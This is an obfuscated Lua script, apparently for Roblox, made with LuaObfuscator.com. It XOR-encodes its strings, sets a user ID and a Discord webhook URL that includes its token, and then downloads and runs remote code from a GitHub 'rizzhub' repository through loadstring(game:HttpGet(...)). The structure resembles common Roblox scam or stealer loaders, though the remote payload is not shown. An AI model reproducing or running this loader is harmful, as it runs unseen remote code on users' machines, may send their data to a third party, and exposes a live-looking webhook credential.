--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1321 -(1009 + 311) , #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1) )),v1(v2(v9,((1506 + 290) -((72 -(15 + 2)) + 1740)) + ((v11-1)% #v9) ,(1 -0) + ((v11-((24 -(22 + 1)) + 0))% #v9) + 1 + 0 )))%(355 -(98 + 1)) ));end return v5(v10);end _G.UserID=(694628370 + 179823559) -549125247 ;_G.Webhook="https://discord.com/api/webhooks/1077369381920706560/QLZBuoFlQ2GQUbDdA8KVWySAXRZcNNsx5HAT-tTJlPl-fWgO0BbGmWhR5ZQ-jElfdnt6";_G.PremiumKey=v7("\122\2\139\41\207\156\125\7\151\18\139\156\48\56\132\5","\72\82\225\115\190\164");_G.ScriptName=v7("\61\115\62\141\97\38\144\35\113\47\255","\109\54\106\173\34\110\209");_G.FirstText=v7("\148\127\67\86\183\104\17\111\181\121\65\94\181\117\95\88","\199\28\49\63");_G.SecondText=v7("\72\220\19\52\155\111\159\45\50\138\127\214\15\58\197\53\145","\27\191\97\93\235");_G.ThirdText=v7("\212\223\212\61\108\246\224\22\250\221\220\124\49\172","\149\179\185\82\31\130\192\82");_G.WaitingTime=(2326 -(1327 + 396 + 83)) -((1041 -(13 + 27)) -661) ;loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/rizzhub/main/Script.lua"))();
